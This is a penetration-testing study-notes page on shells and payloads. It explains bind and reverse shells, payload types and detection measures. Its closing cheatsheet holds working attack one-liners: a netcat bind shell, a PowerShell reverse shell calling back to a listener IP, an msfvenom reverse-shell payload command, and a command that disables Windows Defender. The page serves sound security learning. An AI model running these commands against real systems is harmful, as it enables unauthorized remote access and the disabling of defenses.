Hacker Kayra
  • 📍Introduction Page
  • ⭐Learning Process
    • 🧠Learning Mindset
    • 🖇️Learning Dependencies
    • 🧮Learning Process
  • 🔠Fundamentals
    • 🛜Networking Fundamentals
    • 🐧Linux Fundamentals
    • 🪟Windows Fundamentals
    • 🕵️Active Directory
    • 🕸️Introduction to Web Applications
    • 🗃️Other Useful Concepts
      • Regular Expressions (RegEx)
  • 🧰Tools
    • Nmap
    • Nessus
    • Ffuf
    • Hydra
    • John The Ripper
  • ✍️Write Ups
    • 🗃️Hack The Box Machines
      • 🐧Linux
        • Code
    • 🗃️Proving Grounds Boxes
      • 🐧Linux
        • Stapler
        • eLection
        • Loly
        • Blogger
        • Potato
        • Amaterasu
        • Exfiltrated
        • Pelican
        • Astronaut
        • Cockpit
        • Levram
        • Extplorer
        • LaVita
        • pc
        • Scrutiny
        • Zipper
        • Flu
        • Twiggy
        • Codo
        • Crane
        • Hub
        • BlackGate
        • Boolean
        • ClamAV
        • PayDay
        • Snookums
        • Bratarina
        • Nibbles
      • 🪟Windows
        • Algernon
        • AuthBy
        • Craft
        • Kevin
        • Squid
        • Jacko
        • DVR4
        • Hepet
        • Shenzi
        • Nickel
        • Slort
        • MedJed
        • Active Directory
          • Access
          • Vault
    • 🪪Certificates
      • Certified Professional Penetration Tester (eCPPTv3)
      • Web Application Penetration Tester eXtreme (eWPTXv3)
  • 📚Study Notes
    • Penetration Tester (HTB CPTS)
      • Penetration Testing Process
      • Reconnaissance, Enumeration & Attack Planning
        • Network Enumeration with Nmap (Continue Here)
        • Footprinting (Just Do Formatting)
        • Vulnerability Scanning (Check)
        • File Transfers (Continue Here)
        • Using the Metasploit Framework
        • Web Information Gathering
        • Shells & Payloads
      • Exploitation & Lateral Movement
        • Attacking Common Services (Just Do Formatting)
        • Password Attacks (TBC)
        • Active Directory Enumeration & Attacks (TBC)
        • Pivoting, Tunneling, and Port Forwarding
      • Web Exploitation
        • Using Web Proxies (Check)
        • Attacking Web Applications With Ffuf (Check)
        • Login Bruteforcing
        • Cross-Site Scripting (XSS)
        • Command Injection
        • SQL Injection
        • File Upload Attacks
        • File Inclusion
        • Web Attacks (Check)
        • Attacking Common Applications (Check)
      • Post-Exploitation
        • Linux Privilege Escalation
        • Windows Privilege Escalation (TBC)
  • 🗄️Archive/Backup/Bin
    • Sysmon Usecases (IBM)
    • 🐧Linux Fundamentals (TryHackMe)
      • Introduction
      • Basic Commands
      • Wildcards & Operators
      • Permissions
      • Common Directories
      • Terminal Text Editors
      • General/Useful Utilities
    • 🪟Windows Fundamentals (TryHackMe)
      • Introduction
      • The File System
      • User Accounts
      • Settings & Control Panel & Task Manager
      • System Configuration
    • Active Directory (TryHackMe)
      • Breaching Active Directory
    • FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics
      • Book 2 - Intrusion Analysis
        • Credential Theft
        • Event Log Analysis for Responders and Hunters
    • Certified Threat Hunting Professional (eCTHPv2)
      • Threat Hunting: Hunting the Endpoint & Endpoint Analysis
        • Event IDs, Logging, & SIEMs
    • OSCP
      • Report Writing
      • ✅Passive Information Gathering
      • ✅Active Information Gathering
      • ✅Vulnerability Scanning
      • Introduction to Web Application Attacks
      • Common Web Application Attacks
        • ✅Cross-Site Scripting (XSS)
        • ✅Directory Traversal
        • ✅File Inclusion
        • ✅File Upload Vulnerabilities
        • Command Injection
        • SQL Injection Attacks
        • Client Side Attacks
      • ✅Locating Public Exploits
      • ✅Exploiting Walkthrough
      • Fixing Exploits
      • ✅Antivirus Evasion
      • Password Attacks
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • Port Redirection and SSH Tunneling
      • Tunneling Through Deep Packet Inspection
      • The Metasploit Framework
      • Active Directory Introduction & Enumeration
      • Attacking Active Directory Authentication
      • Lateral Movement in Active Directory
      • Assembling the Pieces
      • Other General Information
    • ⚡Port Swigger (Web Penetration Testing)
      • ✅Information Disclosure
      • ✅Path Traversal (Directory Traversal)
      • ✅OS Command Injection
      • Business Logic Vulnerabilities
      • ✅Authentication
      • ✅Access Control
    • Certified Bug Bounty Hunter (CBBH)
      • Web Requests
        • HTTP Fundamentals
    • Getting Started
      • Introduction
      • Pentesting Basics
    • Certified Penetration Testing Specialist (CPTS)
      • Introduction
        • ✅Penetration Testing Process
          • Penetration Testing Overview
          • Laws & Regulations
          • Penetration Testing Process
          • Pre-Engagement
          • Information Gathering
          • Vulnerability Assessment
          • Exploitation
          • Post-Exploitation
          • Lateral Movement
          • Proof-of-Concept
          • Post-Engagement
          • Practice
          • Academy Module Layout
        • Getting Started with Hack The Box (HTB)
      • Reconnaissance, Enumeration & Attack Planning
        • ✅Network Enumeration with Nmap
          • Enumeration & Introduction to Nmap
          • Host Discovery
          • Host and Port Scanning
          • Saving The Results
          • Service Enumeration
          • Nmap Scripting Engine
          • Scanning Performance
          • Firewall and IDS/IPS Evasion
        • Footprinting
        • ✅Information Gathering - Web Edition
          • Introduction
          • Passive Information Gathering
          • Active Information Gathering
        • Vulnerability Assessment
        • File Transfers
        • Shells & Payloads
        • Using the Metasploit Framework
      • Exploitation & Lateral Movement
        • Password Attacks
        • Attacking Common Services
        • Pivoting, Tunneling, and Port Forwarding
        • Active Directory Enumeration & Attacks
      • Web Exploitation
        • Using Web Proxies
        • ✅Attacking Web Applications with Ffuf
        • ✅Login Brute Forcing
        • SQL Injection Fundamentals
        • SQLMap Essentials
        • Cross-Site Scripting (XSS)
        • File Inclusion
        • File Upload Attacks
        • Command Injections
        • Web Attacks
        • Attacking Common Applications
      • Post-Exploitation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
      • Reporting & Capstone
        • Documentation & Reporting
        • Attacking Enterprise Networks
    • Old Active Directory
    • Tib3rius Privilege Escalation
      • Linux Privilege Escalation
    • HTB Archived Write-Ups (Check)
      • Irked
      • Nibbles
      • Brainfuck
      • Lame (Check)
    • 📋Cheat Sheets
      • Penetration Testing Cheat Sheet (In Progress)
Powered by GitBook
On this page
  • Introduction
  • Shell Types
  • Payloads & One-Liner
  • Host Identification & Payload Options
  • Spawning Interactive & Web Shells
  • Detection and Prevention
  • Monitoring
  • Establish Network Visibility
  • Protecting End Devices
  • Command Cheatsheet
  1. Study Notes
  2. Penetration Tester (HTB CPTS)
  3. Reconnaissance, Enumeration & Attack Planning

Shells & Payloads

Introduction

  • A shell (e.g., Bash, Zsh, CMD, PowerShell) is a program that lets users enter commands and view text output. It gives you direct access to the operating system—essential for enumeration, file transfers, privilege escalation, and persistence.

  • To interact with a shell, you use a terminal emulator (e.g., GNOME Terminal, PuTTY). The command language interpreter (or shell) processes your input and sends commands to the OS. Knowing which shell is running (often indicated by a prompt like $) helps determine what commands you can use.

Shell Types

  • There are two shell types:

  • Bind Shell: The target opens a listening port that you connect

    • A listener must already be running.

    • Firewalls and NAT may block incoming connections.

  • Reverse Shell: The target connects back to your listener, which is often preferred because outbound connections are less likely to be blocked. Tip: Use common ports (e.g., 443) to bypass outbound firewall restrictions.

Payloads & One-Liner

  • Payloads: Code designed to exploit a vulnerability to gain a shell or execute commands. They can come in many forms from small one-liners to full-featured scripts.

  • Metasploit Payloads:

    • Staged Payloads: Send a small initial payload that downloads additional components.

    • Stageless Payloads: Send the entire payload at once; useful when bandwidth is limited or stealth is crucial.

Host Identification & Payload Options

  • The payload we should use will be dependent on the operating system type.

  • There are multiple ways to identify an operating system:

    • TTL Values: A ping response with a TTL around 128 often indicates a Windows host.

    • Nmap OS Detection: Use Nmap to identify the target’s operating system.

  • Common Windows Payload Types:

    • DLLs: Dynamic libraries that can be hijacked or injected to run code as SYSTEM.

    • Batch Files (.bat): Simple DOS scripts for automating commands.

    • VBScript (VBS): Lightweight scripting used in client-side automation.

    • MSI Files: Windows Installer packages that can be crafted to execute payloads.

    • PowerShell Scripts: Highly versatile; use .NET objects and cmdlets for advanced tasks.

  • CMD vs. PowerShell:

    • CMD: Basic, text-only shell suitable for simple commands; leaves little trace.

    • PowerShell: More powerful, supports advanced scripting and .NET objects; ideal when you need extended functionality, but might leave a more noticeable trail.

Spawning Interactive & Web Shells

  • Sometimes, you may only get a non-interactive (non-TTY) shell that lacks a proper prompt or full command support. This happens when there is no shell interpreter language defined in the environment variables associated with the user. There are multiple ways to conver these to interactive shells using Python, Ruby, Perl, etc.

  • Web shells allow you to execute commands on a server via a web browser. Popular sources for pre-made web shells include:

    • Laudanum

    • Pentestmonkey

Detection and Prevention

Monitoring

  • Effective monitoring is key to detecting active shells, payload delivery, and attempts to subvert defenses. Some critical events to watch for include:

    • File Uploads: Monitor application logs for unexpected file uploads. Web applications are common targets for shell uploads, so use firewalls and antivirus to add extra layers of protection.

    • Suspicious Non-Admin User Actions: Unusual commands from regular users—such as repetitive use of whoami or accessing uncommon network shares—may indicate compromise. Enable comprehensive logging (e.g., PowerShell logging) to track shell usage.

    • Anomalous Network Sessions: Analyze NetFlow data to spot unusual patterns such as:

      • Heartbeats on nonstandard ports (e.g., 4444, often used by Meterpreter).

      • Abnormal remote login attempts.

      • Bulk GET/POST requests in a short time frame.

Establish Network Visibility

  • Maintain detailed documentation and visual network topology diagrams to track devices, data flow, and traffic patterns. Tools like NetBrain or even Draw.io can help create interactive maps that integrate with remote management systems. Many network vendors (e.g., Cisco Meraki, Ubiquiti, Check Point, Palo Alto Networks) now offer cloud-based dashboards with Layer 7 visibility for real-time monitoring. Establishing a baseline of normal traffic makes deviations easier to detect and respond to.

Protecting End Devices

  • Antivirus/Endpoint Protection: Keep antivirus software (e.g., Windows Defender) enabled and updated.

  • Patch Management: Implement a robust patch management strategy to ensure timely updates and vulnerability remediation.

Command Cheatsheet

env # Display environment variables to determine the active shell

sudo nc -lvnp <port> # Start a netcat listener on a specified port

nc -nv <listener_ip> <port> # Connect to a netcat listener at the specified IP and port

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <Listener-IP> <Port> > /tmp/f # Bind a shell via netcat

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<Listener-IP>',<Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # PowerShell one-liner for reverse shell connection

Set-MpPreference -DisableRealtimeMonitoring $true # Disable real-time monitoring in Windows Defender

shell # Drop into a system shell from a Meterpreter session

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Attacker-IP> LPORT=<Port> -f <ext> > <Filename.ext> # Generate Linux reverse shell payload

python -c 'import pty; pty.spawn("/bin/sh")' # Spawn an interactive shell via Python

/bin/sh -i # Spawn an interactive shell

perl -e 'exec "/bin/sh";' # Spawn an interactive shell via Perl

ruby -e 'exec "/bin/sh"' # Spawn an interactive shell via Ruby

lua -e "os.execute('/bin/sh')" # Spawn an interactive shell via Lua

awk 'BEGIN {system("/bin/sh")}' # Spawn an interactive shell via awk

find / -name <nameoffile> -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # Spawn an interactive shell via find & awk

find . -exec /bin/sh \; -quit # Alternative method to spawn an interactive shell using find

vim -c ':!/bin/sh' # Spawn an interactive shell via Vim
PreviousWeb Information GatheringNextExploitation & Lateral Movement

Last updated 2 months ago

📚